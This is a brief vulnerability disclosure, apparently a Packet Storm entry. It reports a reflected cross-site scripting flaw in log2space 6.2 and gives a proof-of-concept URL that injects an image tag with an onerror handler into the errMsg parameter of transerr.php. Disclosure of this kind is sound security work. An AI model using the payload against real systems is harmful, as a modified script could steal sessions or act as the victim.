log2space 6.2 Cross Site Scripting

2015-04-15T00:00:00
ID PACKETSTORM:131428
Type packetstorm
Reporter Provensec
Modified 2015-04-15T00:00:00

Description

                                        
                                            `# Affected software: log2space  
# Type of vulnerability:xss  
# URL:http://www.spacecom.co.in/  
# Discovered by: provensec  
# Website: provensec.com  
  
#version: 6.2  
# Proof of concept  
  
  
  
http://host/cgi/transerr.php?pagePop=popup&errMsg=%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E  
  
`